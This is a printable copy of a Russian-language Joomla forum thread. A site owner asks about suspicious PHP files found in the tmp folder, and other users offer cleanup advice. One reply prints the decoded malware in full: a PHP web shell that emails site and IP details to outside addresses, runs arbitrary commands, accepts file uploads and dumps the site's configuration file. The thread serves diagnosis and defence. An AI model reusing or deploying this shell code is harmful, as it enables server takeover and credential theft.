![]() |
Вирус в папке tmp! - Версія для друку. +- Форум Joomla! Україна (https://joomla-ua.org/forum) +-- Форум: Веб-розробка (https://joomla-ua.org/forum/forum-24.html) +--- Форум: Хостинг та домени (https://joomla-ua.org/forum/forum-25.html) +---- Форум: Безпека сервера (хостингу) та сайту (https://joomla-ua.org/forum/forum-4.html) +---- Тема: Вирус в папке tmp! (/thread-1984.html) |
Вирус в папке tmp! - Elimelech - 26.06.2015 Есть сайт на Joomla 2.5.28. Вчера заметил, что в папке tmp появились файлы типа: 20150623063130libs.php.vob со следующим содержанием: Код: <?php Как от появился этот вирус в этой папке. Что делать, чтобы запретить его появление в будущем? Спасибо за ответ! Re: Вирус в папке tmp! - Elimelech - 29.06.2015 а как и куда перенести папку /tmp? Или просто переименовть её? И содать папку типа: /hsphere/local/home/user/сайт.net/tmp356 и прописать путь в админпанели на эту папку. Re: Вирус в папке tmp! - MyWeb - 01.07.2015 возможно тебе поможет вот эта статья https://joomla.shneider-host.ru/blog/optimizatsiia-i-bezopasnost-joomla/kak-ochistit-sait-joomla-ot-virusov хотя тот кто написал вирус еще его и закодировал =\ т.е что конкретно он делает не понятно... Скорее всего конечно какие-то редиректы. Re: Вирус в папке tmp! - qwerty37 - 14.07.2015 Вот что скрыто за этим кодом: error_reporting(0); if (!isset($_SESSION['bajak'])) { $visitcount = 0; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Target ditemukan \n$web$inj"; $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE = OFF";} else {$security= "SAFE_MODE = ON";}; $serper=gethostbyname($_SERVER['SERVER_ADDR']); $injektor = gethostbyname($_SERVER['REMOTE_ADDR']); mail("kuncung525@yahoo.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor"); mail("fullmagic27@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor"); $_SESSION['bajak'] = 1; } else {$_SESSION['bajak']++;}; if(isset($_GET['clone'])){ $source = $_SERVER['SCRIPT_FILENAME']; $desti =$_SERVER['DOCUMENT_ROOT']."/.libs.php"; rename($source, $desti); } $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE : OFF BArNEr";} else {$security= "SAFE_MODE : ON BArNEr";} echo "<title>BArNEr</title><br>"; $dataku = "POWERED BY FULLMAGIC COMMUNITY"; $dataku2 = "ready fresh tools SHELLS FTP CPANEL RDP MAILER"; $dataku3 = "Contact Admin YM : KUNCUNG525"; echo "<font size=2 color=blue><b>".$dataku."</b><br>"; echo "<font size=2 color=red><b>".$dataku2."</b><br>"; echo "<font size=2 color=blue><b>".$dataku3."</b><br>"; echo "<font size=2 color=#888888><b>".$security."</b><br>"; $cur_user="(".get_current_user().")"; echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>"; echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>"; function pwd() { $cwd = getcwd(); if($u=strrpos($cwd,'/')){ if($u!=strlen($cwd)-1){ return $cwd.'/';} else{return $cwd;}; } elseif($u=strrpos($cwd,'\\')){ if($u!=strlen($cwd)-1){ return $cwd.'\\';} else{return $cwd;}; }; } echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>'; echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>'; if(isset($_POST['submit'])){ $uploaddir = pwd(); if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){ echo "Upload Failed"; } else { echo "Upload Success to ".$uploaddir.$name." Succes! "; } } if(isset($_POST['command'])){ $cmd = $_POST['cmd']; echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>"; } elseif(isset($_GET['cmd'])){ $comd = $_GET['cmd']; echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>"; } else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>"; } if(isset($_GET['db'])){ $conf = file_get_contents("../../../configuration.php"); echo $conf; } |